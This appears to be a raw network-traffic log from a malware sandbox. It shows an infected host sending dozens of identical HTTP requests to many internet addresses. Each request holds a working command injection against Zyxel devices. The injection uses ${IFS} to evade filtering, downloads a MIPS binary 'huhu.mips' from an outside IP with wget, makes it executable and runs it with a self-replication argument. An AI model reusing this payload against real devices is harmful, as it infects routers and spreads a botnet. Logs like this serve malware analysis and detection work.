                                                        Feb 2, 2024 06:20:55.631853104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        893192.168.2.144757848.73.230.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631879091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        894192.168.2.1438064165.131.157.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631925106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        895192.168.2.145167424.50.79.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631967068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        896192.168.2.143733644.14.153.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632015944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        897192.168.2.14548542.144.48.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632045984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        898192.168.2.1453442222.255.48.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632095098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        899192.168.2.144236236.162.110.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632116079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        900192.168.2.1434680153.238.111.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632149935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        901192.168.2.143278674.92.155.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632186890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        902192.168.2.1451246145.108.227.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632236004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        903192.168.2.1458536128.224.229.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632271051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        904192.168.2.145398465.204.122.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632301092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        905192.168.2.1448654130.102.23.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632343054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        906192.168.2.1435074186.179.17.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632374048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        907192.168.2.1445382166.73.13.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632416964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        908192.168.2.145658413.71.35.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632486105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        909192.168.2.1435110168.16.17.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632539034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        910192.168.2.144993688.112.88.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632576942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        911192.168.2.144300267.18.125.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632612944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        912192.168.2.144714046.215.24.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632657051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        913192.168.2.1454660115.37.206.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632679939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        914192.168.2.145400451.94.34.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632718086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        915192.168.2.1438604198.175.141.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632750034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        916192.168.2.144239076.29.106.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632797003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        917192.168.2.145881045.172.43.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632842064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        918192.168.2.1443976220.228.230.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632891893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        919192.168.2.1443802129.100.102.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632915974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        920192.168.2.143463898.239.74.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.632971048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        921192.168.2.145460681.8.136.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633008957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        922192.168.2.143469246.115.186.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633037090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        923192.168.2.1456604115.61.204.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633069992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        924192.168.2.1439160148.8.143.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633106947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        925192.168.2.1439800110.72.253.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633132935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        926192.168.2.1440388202.139.60.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633212090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        927192.168.2.1451502129.119.138.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633255959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        928192.168.2.14362709.42.195.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633285999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        929192.168.2.144576248.72.128.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633338928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        930192.168.2.144455891.197.129.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633371115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        931192.168.2.1454300155.44.96.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633400917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        932192.168.2.144851217.228.239.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633434057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        933192.168.2.144569090.123.42.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633466005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        934192.168.2.144187083.48.236.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633496046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        935192.168.2.1438434154.167.234.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633542061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        936192.168.2.1448316116.24.209.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633589029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        937192.168.2.144091663.11.63.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633619070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        938192.168.2.143454614.100.41.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633644104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        939192.168.2.143846032.156.140.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633681059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        940192.168.2.1456336143.118.99.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633722067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        941192.168.2.143288086.162.31.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633764982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        942192.168.2.1441208100.191.142.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633793116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        943192.168.2.144082814.233.97.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633836985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        944192.168.2.145292437.113.111.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633876085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        945192.168.2.143542251.244.82.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633919954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        946192.168.2.1455876223.70.220.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633948088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        947192.168.2.1446062171.7.225.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.633996010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        948192.168.2.1451508117.35.194.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634027004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        949192.168.2.1440358206.223.49.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634046078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        950192.168.2.1435152137.140.194.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634098053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        951192.168.2.1436194172.167.68.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634143114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        952192.168.2.1450036113.94.101.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634169102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        953192.168.2.144762672.229.43.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634203911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        954192.168.2.143495072.8.158.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634236097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        955192.168.2.1453798180.2.239.118443
                                                        TimestampBytes transferredDirectionData
